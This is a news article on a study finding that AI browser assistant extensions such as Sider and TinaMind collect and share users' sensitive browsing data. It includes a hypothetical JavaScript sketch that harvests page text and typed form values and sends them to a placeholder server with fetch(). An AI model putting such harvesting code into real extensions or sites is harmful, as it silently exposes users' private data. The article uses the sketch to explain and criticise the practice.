A new study by researchers from University College London (UCL), UC Davis, and Mediterranea University of Reggio Calabria has exposed significant privacy risks posed by popular AI-powered browser assistants. The report, which analyzed a number of widely used generative AI browser extensions, found that many of these tools collect and transmit sensitive user data without clear consent or adequate safeguards, raising concern among privacy advocates and prompting calls for regulatory scrutiny.
According to the study, some assistants were found to be particularly invasive, collecting a wide range of personal information, including financial details, health records, and even Social Security numbers. Researchers discovered that some assistants transmit full webpage content to their servers, meaning any information visible on the user’s screen could be captured. One notable finding was that some tools continued to track user activity even when users browsed in private mode, a feature people often rely on precisely to avoid such tracking.
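To make the mechanism concrete: a browser extension's content script runs with full access to the page's DOM, so "capturing everything on screen" requires only a few lines of code. The sketch below is a hypothetical illustration, not code from any assistant named in the study; the payload shape and endpoint are assumptions for demonstration only.

```javascript
// Hypothetical sketch of how an extension's content script could harvest
// a page. Nothing here is taken from the audited assistants; it only
// illustrates the kind of access the study describes.
function capturePage(doc) {
  // Values the user has typed into forms: names, card numbers, SSNs, etc.
  const formValues = Array.from(doc.querySelectorAll("input, textarea"))
    .map((el) => el.value)
    .filter((v) => v.length > 0);
  return {
    url: doc.location ? doc.location.href : "",       // which site, which account page
    text: doc.body ? doc.body.innerText : "",         // all text visible on screen
    formValues: formValues,
  };
}

// The assistant's backend endpoint below is invented for illustration;
// transmitting the payload is a single fetch() call:
//   fetch("https://assistant.example.com/ingest", {
//     method: "POST",
//     headers: { "Content-Type": "application/json" },
//     body: JSON.stringify(capturePage(document)),
//   });
```

Note that nothing in this flow is visible to the user: content scripts run silently, and private browsing does not block an installed extension unless the user has explicitly disallowed it there.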
The investigation also revealed that the data collected is frequently used for user profiling. Assistants were found to infer attributes like age, gender, income, and interests from a user’s browsing habits and then use this information to personalize responses, often across different browsing sessions. Furthermore, some extensions, like Sider and TinaMind, were found to share user queries and identifiable information—such as IP addresses—with third-party analytics platforms, enabling cross-site tracking and targeted advertising.
Privacy experts warn that this data collection poses a serious threat to personal security. The information, once gathered, is vulnerable to data breaches and could be exploited for malicious purposes. The study’s authors are calling for urgent regulatory oversight, noting that some of the practices may already be in violation of privacy laws like the Health Insurance Portability and Accountability Act (HIPAA) and the Family Educational Rights and Privacy Act (FERPA) in the U.S. and likely fall short of the EU’s General Data Protection Regulation (GDPR).
The findings highlight a critical dilemma for consumers: the convenience offered by AI assistants often comes at the steep price of personal privacy. As these tools become more integrated into our daily digital lives, the need for transparency and stronger user control over personal data is more pressing than ever.